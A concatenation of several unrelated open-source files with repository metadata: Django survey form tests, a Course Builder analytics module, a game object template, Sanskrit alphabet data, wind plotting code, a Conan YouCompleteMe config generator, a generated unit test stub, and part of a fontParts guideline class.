form_data['answer_type'] = Question.TEXT
form_data['options']=['some option question']
question_form = QuestionForm(form_data)
self.assertTrue(question_form.is_valid())
question = question_form.save(group=[self.household_member_group.id])
self.assertEqual(0, question.batches.all().count())
self.assertEqual(0, question.options.all().count())
def test_should_filter_options_not_supplied(self):
form_data = self.form_data.copy()
form_data['answer_type'] = Question.TEXT
del form_data['options']
question_form = QuestionForm(form_data)
self.assertTrue(question_form.is_valid())
question = question_form.save(group=[self.household_member_group.id])
self.assertEqual(0, question.batches.all().count())
self.assertEqual(0, question.options.all().count())
def test_form_should_not_be_valid_for_subquestion_if_same_subquestion_already_exist(self):
question = Question.objects.create(text="Question 1?", answer_type=Question.NUMBER, order=1,
group=self.household_member_group, identifier='Q1')
sub_question = Question.objects.create(text="this is a sub question", answer_type=Question.NUMBER,
subquestion=True, parent=question, group=self.household_member_group,
identifier='Q2')
question.batches.add(self.batch)
sub_question.batches.add(self.batch)
form_data = self.form_data.copy()
form_data['text'] = sub_question.text
form_data['answer_type'] = sub_question.answer_type
del form_data['options']
question_form = QuestionForm(data=form_data, parent_question=sub_question.parent)
self.assertFalse(question_form.is_valid())
message= "Sub question for this question with this text already exists."
self.assertIn(message, question_form.errors.values()[0])
def test_form_has_parent_groups_only_if_parent_question_is_supplied(self):
question = Question.objects.create(text="Question 1?", answer_type=Question.NUMBER, order=1,
group=self.household_member_group, identifier='Q1')
another_member_group = HouseholdMemberGroup.objects.create(name='Age 6-7', order=2)
question_form = QuestionForm(parent_question=question)
self.assertIn((self.household_member_group.id, self.household_member_group.name), question_form.fields['group'].choices)
self.assertNotIn((another_member_group.id, another_member_group.name), question_form.fields['group'].choices)
def test_form_has_no_groups_only_if_parent_question_has_no_group_and_is_supplied(self):
question = Question.objects.create(text="Question 1?", answer_type=Question.NUMBER, order=1, identifier='Q1')
another_member_group = HouseholdMemberGroup.objects.create(name='Age 6-7', order=2)
question_form = QuestionForm(parent_question=question)
self.assertNotIn((self.household_member_group.id, self.household_member_group.name), question_form.fields['group'].choices)
self.assertNotIn((another_member_group.id, another_member_group.name), question_form.fields['group'].choices)
def test_form_has_all_groups_only_if_no_parent_question_is_supplied(self):
question = Question.objects.create(text="Question 1?", answer_type=Question.NUMBER, order=1,
group=self.household_member_group, identifier='Q1')
another_member_group = HouseholdMemberGroup.objects.create(name='Age 6-7', order=2)
question_form = QuestionForm()
self.assertIn((self.household_member_group.id, self.household_member_group.name), question_form.fields['group'].choices)
self.assertIn((another_member_group.id, another_member_group.name), question_form.fields['group'].choices)
def test_form_is_invalid_if_parent_question_group_is_different_from_subquestion_group(self):
another_member_group = HouseholdMemberGroup.objects.create(name='Age 6-7', order=2)
question = Question.objects.create(text="Question 1?", answer_type=Question.NUMBER, order=1,
group=another_member_group, identifier='Q1')
question_form = QuestionForm(parent_question=question, data=self.form_data)
self.assertFalse(question_form.is_valid())
error_message = "Subquestions cannot have a different group from its parent."
self.assertEqual([error_message], question_form.errors['group'])
def test_form_is_invalid_if_module_not_selected(self):
form_data = self.form_data.copy()
form_data['module'] = ''
question_form = QuestionForm(form_data)
self.assertFalse(question_form.is_valid())
def test_form_has_parent_module_only_if_parent_question_has_one(self):
question = Question.objects.create(text="Question 1?", answer_type=Question.NUMBER, order=1,
module=self.question_module, identifier='Q1')
another_module = QuestionModule.objects.create(name="haha")
question_form = QuestionForm(parent_question=question)
self.assertIn((self.question_module.id, self.question_module.name), question_form.fields['module'].choices)
self.assertNotIn((another_module.id, another_module.name), question_form.fields['module'].choices)
def test_form_has_all_module_if_parent_question_has_no_module(self):
question = Question.objects.create(text="Question 1?", answer_type=Question.NUMBER, order=1,
identifier='Q1')
another_module = QuestionModule.objects.create(name="haha")
question_form = QuestionForm(parent_question=question)
self.assertEqual(2, len(question_form.fields['module'].choices))
self.assertIn((self.question_module.id, self.question_module.name), question_form.fields['module'].choices)
self.assertIn((another_module.id, another_module.name), question_form.fields['module'].choices)
def test_form_has_all_module_if_parent_question_is_not_supplied(self):
another_module = QuestionModule.objects.create(name="haha")
question_form = QuestionForm()
self.assertEqual(2, len(question_form.fields['module'].choices))
self.assertIn((self.question_module.id, self.question_module.name), question_form.fields['module'].choices)
self.assertIn((another_module.id, another_module.name), question_form.fields['module'].choices)
def test_form_is_invalid_if_parent_question_module_is_different_from_subquestion_module(self):
another_module = QuestionModule.objects.create(name="haha")
question = Question.objects.create(text="Question 1?", answer_type=Question.NUMBER, order=1,
module=another_module, identifier='Q1')
question_form = QuestionForm(parent_question=question, data=self.form_data)
self.assertFalse(question_form.is_valid())
error_message = "Subquestions cannot have a different module from its parent."
self.assertEqual([error_message], question_form.errors['module'])
def test_form_is_invalid_if_trying_to_add_duplicate_subquestion_under_question(self):
question = Question.objects.create(text="Question 1?", answer_type=Question.NUMBER, order=1,
group=self.household_member_group, identifier='Q1')
sub_question_data = {'text': 'Subquestion 1?',
'answer_type':Question.NUMBER,
'group': self.household_member_group,
'identifier': 'ID 1',
'subquestion': True,
'parent': question}
sub_question = Question.objects.create(**sub_question_data)
error_message = 'Sub question for this question with this text already exists.'
sub_question_data['group'] = self.household_member_group.id
question_form = QuestionForm(parent_question=question, data=sub_question_data)
is_valid = question_form.is_valid()
self.assertFalse(is_valid)
self.assertIn(error_message, question_form.errors['text'])
| {
"content_hash": "b23323446df361ccad2a9be0e05e5a2e",
"timestamp": "",
"source": "github",
"line_count": 265,
"max_line_length": 133,
"avg_line_length": 52.87924528301887,
"alnum_prop": 0.6594590737172625,
"repo_name": "unicefuganda/mics",
"id": "bdd5685f827f79d0c672e0b7013890db6f994b00",
"size": "14013",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "survey/tests/forms/test_questions_form.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "37725"
},
{
"name": "JavaScript",
"bytes": "390607"
},
{
"name": "Python",
"bytes": "5209696"
},
{
"name": "Shell",
"bytes": "1277"
}
],
"symlink_target": ""
} |
"""Module providing public analytics interfaces."""
__author__ = 'Mike Gainer (mgainer@google.com)'
import re
import jinja2
from common import crypto
from controllers import utils as controllers_utils
from models.analytics import display
from models.analytics import utils as analytics_utils
from models import data_sources
from models import transforms
class Visualization(object):
registry = {}
def __init__(self, name, title, html_template_name,
data_source_classes=None):
"""Establish a new visualization.
Args:
name: Valid Javascript identifier to be used for this visualization
when generating scripts via templates.
title: Section title for visualization on the
Dashboard -> Analytics page.
html_template_name: Name of a file which contains a Jinja template
which will be used to generate a chart or graph for the
visualization. This can be specified as a path relative to
the CB installation root
(e.g. 'modules/my_new_module/my_visualization.html'), or
relative to any of the data sources or generators used for the
visualization (meaning you can just use the name of the HTML
file without any path components if it's in the same
directory).
data_source_classes: An optional array of data source classes.
This should contain only classes inheriting from
data_sources.base_types._DataSource.
Raises:
ValueError: when any of
- name is already registered as a visualization
- name is not a valid JavaScript identifier.
- a data source class is not registered with the data_sources
module.
"""
if name and not re.match('^[_0-9a-z]+$', name):
raise ValueError(
'name "%s" must contain only lowercase letters, ' % name +
'numbers or underscore characters')
if name in self.registry:
raise ValueError(
'Visualization %s is already registered' % name)
data_source_classes = data_source_classes or []
for data_source_class in data_source_classes:
if not data_sources.Registry.is_registered(data_source_class):
raise ValueError(
'All data source classes used in visualizations must be '
'registered in models.data_sources.Registry; '
'"%s" is not registered.' % data_source_class.__name__)
self._name = name
self._title = title
self._template_name = html_template_name
self._data_source_classes = data_source_classes
self.registry[name] = self
@property
def name(self):
return self._name
@property
def title(self):
return self._title
@property
def template_name(self):
return self._template_name
@property
def generator_classes(self):
ret = set()
for source_class in self.data_source_classes:
ret.update(source_class.required_generators())
return ret
@property
def data_source_classes(self):
return set(self._data_source_classes)
@property
def rest_data_source_classes(self):
return set([c for c in self._data_source_classes
if issubclass(c, data_sources.AbstractRestDataSource)])
@classmethod
def for_name(cls, name):
return cls.registry.get(name)
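# Illustrative usage (a minimal sketch, not part of the original module):
# a Visualization is typically registered once at import time. The name,
# title, template path and data source class below are hypothetical; any
# data source class must already be registered with data_sources.Registry.
#
#   Visualization(
#       'example_counts',
#       'Example Counts',
#       'modules/example/example_counts.html',
#       data_source_classes=[ExampleCountsDataSource])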
class _TemplateRenderer(object):
"""Insulate display code from knowing about handlers and Jinja.
This abstraction makes unit testing simpler, as well as decouples
the display code from being directly dependent on web-request
handler types.
"""
def __init__(self, handler):
self._handler = handler
def render(self, visualization, template_name, template_values):
# pylint: disable=protected-access
template_dirs = analytics_utils._get_template_dir_names(visualization)
if hasattr(self._handler, 'ADDITIONAL_DIRS'):
template_dirs.extend(self._handler.ADDITIONAL_DIRS)
return jinja2.utils.Markup(
self._handler.get_template(template_name, template_dirs).render(
template_values, autoescape=True))
def get_base_href(self):
return controllers_utils.ApplicationHandler.get_base_href(self._handler)
def get_current_url(self):
return self._handler.request.url
def generate_display_html(handler, xsrf_creator, visualizations):
"""Generate sections of HTML representing each visualization.
This generates multiple small HTML sections which are intended for
inclusion as-is into a larger display (specifically, the dashboard
page showing visualizations). The HTML will likely contain JavaScript
elements that induce callbacks from the page to the REST service
providing JSON data.
Args:
handler: Must be derived from controllers.utils.ApplicationHandler.
Used to load HTML templates and to establish page context
for learning the course to which to restrict data loading.
xsrf_creator: Thing which can create XSRF tokens by exposing
a create_token(token_name) method. Normally, set this
to common.crypto.XsrfTokenManager. Unit tests use a
bogus creator to avoid DB requirement.
visualizations: The Visualization objects to render on the page.
Returns:
An array of HTML sections. This will consist of SafeDom elements
and the result of HTML template expansion.
"""
# pylint: disable=protected-access
return display._generate_display_html(
_TemplateRenderer(handler), xsrf_creator, handler.app_context,
visualizations)
class TabRenderer(object):
"""Convenience class for creating tabs for rendering in dashboard."""
def __init__(self, contents):
self._contents = contents
def __call__(self, handler):
return generate_display_html(
handler, crypto.XsrfTokenManager, self._contents)
class AnalyticsHandler(controllers_utils.ReflectiveRequestHandler,
controllers_utils.ApplicationHandler):
default_action = 'run_visualization'
get_actions = []
post_actions = ['run_visualizations', 'cancel_visualizations']
def _get_generator_classes(self):
# pylint: disable=protected-access
return analytics_utils._generators_for_visualizations(
[Visualization.for_name(name)
for name in self.request.get_all('visualization')])
def post_run_visualizations(self):
for generator_class in self._get_generator_classes():
generator_class(self.app_context).submit()
self.redirect(str(self.request.get('r')))
def post_cancel_visualizations(self):
for generator_class in self._get_generator_classes():
generator_class(self.app_context).cancel()
self.redirect(str(self.request.get('r')))
class AnalyticsStatusRESTHandler(controllers_utils.BaseRESTHandler):
URL = '/analytics/rest/status'
def get(self):
generator_classes = set()
for visualization_name in self.request.get_all('visualization'):
visualization = Visualization.for_name(visualization_name)
generator_classes.update(visualization.generator_classes)
generator_status = {}
for generator_class in generator_classes:
job = generator_class(self.app_context).load()
generator_status[generator_class] = job and job.has_finished
finished_visualizations = set()
finished_sources = set()
finished_generators = set()
all_visualizations_finished = True
for visualization_name in self.request.get_all('visualization'):
all_sources_finished = True
visualization = Visualization.for_name(visualization_name)
for data_source_class in visualization.data_source_classes:
all_generators_finished = True
for generator_class in data_source_class.required_generators():
all_generators_finished &= generator_status[generator_class]
all_sources_finished &= all_generators_finished
if all_generators_finished:
if issubclass(data_source_class,
data_sources.AbstractRestDataSource):
finished_sources.add(data_source_class.get_name())
else:
finished_sources.add(data_source_class.__name__)
all_visualizations_finished &= all_sources_finished
if all_sources_finished:
finished_visualizations.add(visualization_name)
result = {
'finished_visualizations': finished_visualizations,
'finished_sources': finished_sources,
'finished_generators': finished_generators,
'finished_all': all_visualizations_finished,
}
transforms.send_json_response(self, 200, "Success.", result)
def get_namespaced_handlers():
return [
('/analytics', AnalyticsHandler),
(AnalyticsStatusRESTHandler.URL, AnalyticsStatusRESTHandler),
]
def get_global_handlers():
# Restrict files served from full zip package to minimum needed
return []
| {
"content_hash": "fca400d0764c827a6234931730d74616",
"timestamp": "",
"source": "github",
"line_count": 250,
"max_line_length": 80,
"avg_line_length": 37.916,
"alnum_prop": 0.6431058128494567,
"repo_name": "andela-angene/coursebuilder-core",
"id": "d51649f34607e6dcf5a226da987c26babd76720a",
"size": "10077",
"binary": false,
"copies": "4",
"ref": "refs/heads/develop-frontend",
"path": "coursebuilder/models/analytics/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "729194"
},
{
"name": "HTML",
"bytes": "739873"
},
{
"name": "JavaScript",
"bytes": "720406"
},
{
"name": "Python",
"bytes": "6245524"
},
{
"name": "Shell",
"bytes": "53815"
}
],
"symlink_target": ""
} |
from swgpy.object import *
def create(kernel):
result = Building()
result.template = "object/building/poi/shared_naboo_gungtrad_medium2.iff"
result.attribute_template_id = -1
result.stfName("poi_n","base_poi_building")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result | {
"content_hash": "99347f4ff5bc16593413a65edc3e1be1",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 74,
"avg_line_length": 23.692307692307693,
"alnum_prop": 0.6948051948051948,
"repo_name": "anhstudios/swganh",
"id": "78e7ee98a852febddde9276ef65087c9869edfd5",
"size": "453",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "data/scripts/templates/object/building/poi/shared_naboo_gungtrad_medium2.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "11887"
},
{
"name": "C",
"bytes": "7699"
},
{
"name": "C++",
"bytes": "2357839"
},
{
"name": "CMake",
"bytes": "41264"
},
{
"name": "PLSQL",
"bytes": "42065"
},
{
"name": "Python",
"bytes": "7503510"
},
{
"name": "SQLPL",
"bytes": "42770"
}
],
"symlink_target": ""
} |
"""Data module for the Sanskrit languages alphabet and related characters."""
# The digits in Sanskrit, indexed 0 to 9: the index in the list
# is the decimal digit that the Devanagari numeral represents.
DIGITS = ['०','१','२','३','४','५','६','७','८','९']
# This is the list of simple vowels for the Sanskrit language.
# They give the sounds a, aa, i, ii, u, uu, e, o, ri, lri.
INDEPENDENT_VOWELS_SIMPLE = ['अ','आ','इ','ई','उ','ऊ','ए','ओ','ऋ','ऌ']
# These vowels are diphthongs in Sanskrit, meaning each combines two vowel sounds.
# They give the sounds ai and au.
INDEPENDENT_VOWELS_DIPTHONGS = ['ऐ','औ']
# These are other independent letters which are neither vowels nor consonants but are grouped with the vowels.
# They are the anuswara and the visarga.
# The anuswara gives a nasal sound, and its point of pronunciation is the same as that of the consonant that follows it.
# For example, the word Sanskrit has an anuswara and is pronounced as sans-kri-ta.
# The visarga is pronounced like the "h" in "house".
INDEPENDENT_VOWELS = ['अं','अः']
# These are the dependent vowel signs; they are added after or attached to the consonants.
DEPENDENT_VOWELS = ['ा','ि','ी','ु','ू','े','ै','ो','ौ','ं','ः','ृ','ॄ']
# These are the various consonants in Sanskrit.
# Within each list below, moving from index 0 to the last index goes from unaspirated to nasal.
# The gutturals are pronounced from the throat.
CONSONANT_GUTTURALS = ['क','ख','ग','घ','ङ']
# These consonants are pronounced using the rear part of the tongue.
CONSONANT_PALATALS = ['च','छ','ज','झ','ञ']
# These consonants are pronounced with the tip of the tongue.
CONSONANT_CEREBRALS = ['ट','ठ','ड','ढ','ण']
# These consonants are pronounced against the upper teeth.
CONSONANT_DENTALS = ['त','थ','द','ध','न']
# These consonants are pronounced with the lips.
CONSONANT_LABIALS = ['प','फ','ब','भ','म']
# These sound almost like vowels when pronounced, hence the name semivowels.
SEMIVOWEL_CONSONANT = ['य','र','ल','व']
# These consonants make a hissing sound when pronounced.
SIBILANT_CONSONANT = ['श','ष','स']
# This consonant is pronounced with a breath of air from the lungs.
SONANT_ASPIRATE = ['ह']
# These are the other symbols used in the Sanskrit language.
# At index 0 is the Om symbol. At index 1 is the virama (also called halant),
# which is used for suppressing the inherent vowel of a consonant letter.
# At index 2 is the chandrabindu, used for nasalization of a vowel.
# At index 3 is the letter called avagraha, and the index 4 symbol is called the nukta.
# At indices 5 and 6 are the danda and double danda, used for ending shlokas in Sanskrit.
OTHER_ALPHABETS = ['ॐ','्','ँ','ऽ','़','।','॥']
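# Illustrative helper (a minimal sketch, not part of the original module):
# DIGITS is indexed by the decimal digit it represents, so a non-negative
# integer can be rendered with Devanagari numerals by mapping each of its
# decimal digits through the list. The helper name below is hypothetical.
def to_devanagari_numerals(number):
    """Return the non-negative integer `number` written with DIGITS."""
    return ''.join(DIGITS[int(digit)] for digit in str(number))
# Example: to_devanagari_numerals(2023) == '२०२३'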
| {
"content_hash": "871ab4057e6a545fdcab9c045a0b45fb",
"timestamp": "",
"source": "github",
"line_count": 72,
"max_line_length": 110,
"avg_line_length": 37.93055555555556,
"alnum_prop": 0.706334675942878,
"repo_name": "LBenzahia/cltk",
"id": "2803ab0ce5527c62ef20fd6e0e952cde1b84ac20",
"size": "2889",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "cltk/corpus/sanskrit/alphabet.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "4825"
},
{
"name": "Python",
"bytes": "2810724"
}
],
"symlink_target": ""
} |
"""Plots relating to the wind."""
from makani.analysis.plot.python import mplot
from makani.lib.python.h5_utils import numpy_utils
from matplotlib.pyplot import plot
from matplotlib.pyplot import ylabel
import pandas as pd
MFig = mplot.PlotGroup.MFig # pylint: disable=invalid-name
class Plots(mplot.PlotGroup):
"""Plots of the wind data."""
@MFig(title='Wind speed at ground level', ylabel='Speed [m/s]',
xlabel='Time [s]')
def PlotWindSpeedAtGround(self, c):
wind_g_mag = numpy_utils.Vec3Norm(c['state_est']['wind_g']['vector'])
plot(c['time'], wind_g_mag)
@MFig(title='Wind speed aloft', ylabel='Speed [m/s]', xlabel='Time [s]')
def PlotWindSpeedAloft(self, c):
wind_aloft_g_mag = numpy_utils.Vec3Norm(
c['state_est']['wind_aloft_g']['vector'])
plot(c['time'], wind_aloft_g_mag)
@MFig(title='Turbulence Intensity', xlabel='Time [s]', pedantic=False)
def PlotTurbulenceIntensity(self, c, window_minutes=5):
assert isinstance(window_minutes, int)
assert window_minutes >= 1
df = pd.DataFrame(index=pd.to_timedelta(c['time'], unit='s'))
df['wind_g_mag'] = numpy_utils.Vec3Norm(c['state_est']['wind_g']['vector'])
df_1s = df.resample('1s', label='right').agg(['mean', 'std'])
df_1s_nt = df_1s.xs('mean', level=1, axis='columns').rolling(
window='%dT' % window_minutes,
min_periods=window_minutes * 60).agg(['mean', 'std']).shift(
periods=(-window_minutes * 60) // 2, freq='s')
df_1s_nt_ti = (df_1s_nt[('wind_g_mag', 'std')] /
df_1s_nt[('wind_g_mag', 'mean')])
ylabel('TI (over %d-minute rolling calculations)' % window_minutes)
plot(df_1s_nt_ti.keys().total_seconds(), df_1s_nt_ti)
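# Illustrative sketch (not part of the original module): turbulence intensity
# over a window is the standard deviation of the wind speed divided by its
# mean, which is what the rolling pandas computation above evaluates for each
# window. The synthetic 1 Hz series below is an assumption for demonstration.
def _example_turbulence_intensity():
    import numpy as np
    speeds = 8.0 + 0.5 * np.random.randn(300)  # ~5 minutes of 1 Hz samples.
    return speeds.std() / speeds.mean()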
| {
"content_hash": "96063500612260e84d1fc2d8f79c9d89",
"timestamp": "",
"source": "github",
"line_count": 43,
"max_line_length": 79,
"avg_line_length": 40,
"alnum_prop": 0.6395348837209303,
"repo_name": "google/makani",
"id": "098b15d7e683a81504a338ec28212238b2589b77",
"size": "2309",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "analysis/plot/python/plot_groups/wind.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "119408"
},
{
"name": "C",
"bytes": "20174258"
},
{
"name": "C++",
"bytes": "30512322"
},
{
"name": "CSS",
"bytes": "8921"
},
{
"name": "Dockerfile",
"bytes": "1381"
},
{
"name": "Emacs Lisp",
"bytes": "1134"
},
{
"name": "HTML",
"bytes": "65745"
},
{
"name": "Java",
"bytes": "1558475"
},
{
"name": "JavaScript",
"bytes": "130727"
},
{
"name": "Jupyter Notebook",
"bytes": "1154728"
},
{
"name": "MATLAB",
"bytes": "1026162"
},
{
"name": "Makefile",
"bytes": "2798"
},
{
"name": "Objective-C",
"bytes": "62972"
},
{
"name": "Perl",
"bytes": "870724"
},
{
"name": "Python",
"bytes": "5552781"
},
{
"name": "RPC",
"bytes": "195736"
},
{
"name": "Roff",
"bytes": "2567875"
},
{
"name": "SWIG",
"bytes": "8663"
},
{
"name": "Shell",
"bytes": "297941"
},
{
"name": "Starlark",
"bytes": "462998"
},
{
"name": "Vim Script",
"bytes": "2281"
},
{
"name": "XC",
"bytes": "50398"
},
{
"name": "XS",
"bytes": "49289"
}
],
"symlink_target": ""
} |
from conans.model import Generator
import json
class YouCompleteMeGenerator(Generator):
template = '''
# This file is NOT licensed under the GPLv3, which is the license for the rest
# of YouCompleteMe.
#
# Here's the license text for this file:
#
# This is free and unencumbered software released into the public domain.
#
# Anyone is free to copy, modify, publish, use, compile, sell, or
# distribute this software, either in source code form or as a compiled
# binary, for any purpose, commercial or non-commercial, and by any
# means.
#
# In jurisdictions that recognize copyright laws, the author or authors
# of this software dedicate any and all copyright interest in the
# software to the public domain. We make this dedication for the benefit
# of the public at large and to the detriment of our heirs and
# successors. We intend this dedication to be an overt act of
# relinquishment in perpetuity of all present and future rights to this
# software under copyright law.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
#
# For more information, please refer to <http://unlicense.org/>
import os
import json
import ycm_core
import logging
_logger = logging.getLogger(__name__)
def DirectoryOfThisScript():
return os.path.dirname( os.path.abspath( __file__ ) )
# These are the compilation flags that will be used in case there's no
# compilation database set (by default, one is not set).
# CHANGE THIS LIST OF FLAGS. YES, THIS IS THE DROID YOU HAVE BEEN LOOKING FOR.
flags = [
'-x', 'c++'
]
conan_flags = json.loads(open("conan_ycm_flags.json", "r").read())
flags.extend(conan_flags["flags"])
flags.extend(conan_flags["defines"])
flags.extend(conan_flags["includes"])
# Set this to the absolute path to the folder (NOT the file!) containing the
# compile_commands.json file to use that instead of 'flags'. See here for
# more details: http://clang.llvm.org/docs/JSONCompilationDatabase.html
#
# You can get CMake to generate this file for you by adding:
# set( CMAKE_EXPORT_COMPILE_COMMANDS 1 )
# to your CMakeLists.txt file.
#
# Most projects will NOT need to set this to anything; you can just change the
# 'flags' list of compilation flags. Notice that YCM itself uses that approach.
compilation_database_folder = os.path.join(DirectoryOfThisScript(), 'Debug')
if os.path.exists( compilation_database_folder ):
database = ycm_core.CompilationDatabase( compilation_database_folder )
if not database.DatabaseSuccessfullyLoaded():
_logger.warn("Failed to load database")
database = None
else:
database = None
SOURCE_EXTENSIONS = [ '.cpp', '.cxx', '.cc', '.c', '.m', '.mm' ]
def GetAbsolutePath(include_path, working_directory):
if os.path.isabs(include_path):
return include_path
return os.path.join(working_directory, include_path)
def MakeRelativePathsInFlagsAbsolute( flags, working_directory ):
if not working_directory:
return list( flags )
new_flags = []
make_next_absolute = False
path_flags = [ '-isystem', '-I', '-iquote', '--sysroot=' ]
for flag in flags:
new_flag = flag
if make_next_absolute:
make_next_absolute = False
new_flag = GetAbsolutePath(flag, working_directory)
for path_flag in path_flags:
if flag == path_flag:
make_next_absolute = True
break
if flag.startswith( path_flag ):
path = flag[ len( path_flag ): ]
new_flag = flag[:len(path_flag)] + GetAbsolutePath(path, working_directory)
break
if new_flag:
new_flags.append( new_flag )
return new_flags
def IsHeaderFile( filename ):
extension = os.path.splitext( filename )[ 1 ]
return extension.lower() in [ '.h', '.hxx', '.hpp', '.hh' ]
def GetCompilationInfoForFile( filename ):
# The compilation_commands.json file generated by CMake does not have entries
# for header files. So we do our best by asking the db for flags for a
# corresponding source file, if any. If one exists, the flags for that file
# should be good enough.
if IsHeaderFile( filename ):
basename = os.path.splitext( filename )[ 0 ]
for extension in SOURCE_EXTENSIONS:
replacement_file = basename + extension
if os.path.exists( replacement_file ):
compilation_info = database.GetCompilationInfoForFile( replacement_file )
if compilation_info.compiler_flags_:
return compilation_info
return None
return database.GetCompilationInfoForFile( filename )
def FlagsForFile( filename, **kwargs ):
relative_to = None
compiler_flags = None
if database:
# Bear in mind that compilation_info.compiler_flags_ does NOT return a
# python list, but a "list-like" StringVec object
compilation_info = GetCompilationInfoForFile( filename )
if compilation_info is None:
relative_to = DirectoryOfThisScript()
compiler_flags = flags
else:
relative_to = compilation_info.compiler_working_dir_
compiler_flags = compilation_info.compiler_flags_
else:
relative_to = DirectoryOfThisScript()
compiler_flags = flags
final_flags = MakeRelativePathsInFlagsAbsolute( compiler_flags, relative_to )
for flag in final_flags:
if flag.startswith("-W"):
final_flags.remove(flag)
_logger.info("Final flags for %s are %s" % (filename, ' '.join(final_flags)))
return {{
'flags': final_flags + ["-I/usr/include", "-I/usr/include/c++/{cxx_version}"],
'do_cache': True
}}
'''
@property
def filename(self):
pass
@property
def content(self):
def prefixed(prefix, values):
return [prefix + x for x in values]
conan_flags = {
"includes" : prefixed("-isystem", self.deps_build_info.include_paths),
"defines" : prefixed("-D", self.deps_build_info.defines),
"flags" : self.deps_build_info.cppflags
}
cxx_version = ''
try:
cxx_version = str(self.settings.compiler.version).split('.')[0]
except Exception:
pass
ycm_data = self.template.format(cxx_version=cxx_version)
return {"conan_ycm_extra_conf.py" : ycm_data,
"conan_ycm_flags.json" : json.dumps(conan_flags, indent=2)}
| {
"content_hash": "aafeb67cb849feee04e9d3d1b1ae77c2",
"timestamp": "",
"source": "github",
"line_count": 196,
"max_line_length": 83,
"avg_line_length": 33.61734693877551,
"alnum_prop": 0.6926696008499014,
"repo_name": "luckielordie/conan",
"id": "9871fd9656e3532ecb0a85fc87e17bd1742c19bb",
"size": "6589",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "conans/client/generators/ycm.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "1100"
},
{
"name": "Dockerfile",
"bytes": "3392"
},
{
"name": "Groovy",
"bytes": "7992"
},
{
"name": "Python",
"bytes": "3232431"
},
{
"name": "Shell",
"bytes": "1864"
}
],
"symlink_target": ""
} |
"""
Server API
Reference for Server API (REST/Json)
OpenAPI spec version: 2.0.21
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import sys
import unittest
import kinow_client
from kinow_client.rest import ApiException
from kinow_client.models.product_comment_list_response import ProductCommentListResponse
class TestProductCommentListResponse(unittest.TestCase):
""" ProductCommentListResponse unit test stubs """
def setUp(self):
pass
def tearDown(self):
pass
def testProductCommentListResponse(self):
"""
Test ProductCommentListResponse
"""
model = kinow_client.models.product_comment_list_response.ProductCommentListResponse()
if __name__ == '__main__':
unittest.main()
| {
"content_hash": "925ec4a65a0c0398e9044ff8aef52158",
"timestamp": "",
"source": "github",
"line_count": 40,
"max_line_length": 94,
"avg_line_length": 21.175,
"alnum_prop": 0.7012987012987013,
"repo_name": "kinow-io/kinow-python-sdk",
"id": "a3863581591eeef67ecf392a628ff856566960e6",
"size": "864",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test/test_product_comment_list_response.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "4659182"
},
{
"name": "Shell",
"bytes": "1666"
}
],
"symlink_target": ""
} |
import math
from fontTools.misc import transform
from fontParts.base.base import (
BaseObject,
TransformationMixin,
InterpolationMixin,
SelectionMixin,
PointPositionMixin,
IdentifierMixin,
dynamicProperty,
reference
)
from fontParts.base import normalizers
from fontParts.base.compatibility import GuidelineCompatibilityReporter
from fontParts.base.color import Color
from fontParts.base.deprecated import DeprecatedGuideline, RemovedGuideline
class BaseGuideline(
BaseObject,
TransformationMixin,
DeprecatedGuideline,
RemovedGuideline,
PointPositionMixin,
InterpolationMixin,
IdentifierMixin,
SelectionMixin
):
"""
A guideline object. This object is almost always
created with :meth:`BaseGlyph.appendGuideline`.
An orphan guideline can be created like this::
>>> guideline = RGuideline()
"""
copyAttributes = (
"x",
"y",
"angle",
"name",
"color"
)
def _reprContents(self):
contents = []
if self.name is not None:
contents.append("'%s'" % self.name)
if self.layer is not None:
contents.append("('%s')" % self.layer.name)
return contents
# -------
# Parents
# -------
# Glyph
_glyph = None
glyph = dynamicProperty("glyph", "The guideline's parent :class:`BaseGlyph`.")
def _get_glyph(self):
if self._glyph is None:
return None
return self._glyph()
def _set_glyph(self, glyph):
if self._font is not None:
raise AssertionError("font for guideline already set")
if self._glyph is not None:
raise AssertionError("glyph for guideline already set")
if glyph is not None:
glyph = reference(glyph)
self._glyph = glyph
# Layer
layer = dynamicProperty("layer", "The guideline's parent :class:`BaseLayer`.")
def _get_layer(self):
if self._glyph is None:
return None
return self.glyph.layer
# Font
_font = None
font = dynamicProperty("font", "The guideline's parent :class:`BaseFont`.")
def _get_font(self):
if self._font is not None:
return self._font()
elif self._glyph is not None:
return self.glyph.font
return None
def _set_font(self, font):
if self._font is not None:
raise AssertionError("font for guideline already set")
if self._glyph is not None:
raise AssertionError("glyph for guideline already set")
if font is not None:
font = reference(font)
self._font = font
# --------
# Position
# --------
# x
x = dynamicProperty(
"base_x",
"""
The x coordinate of the guideline.
It must be an :ref:`type-int-float`. ::
>>> guideline.x
100
>>> guideline.x = 101
"""
)
def _get_base_x(self):
value = self._get_x()
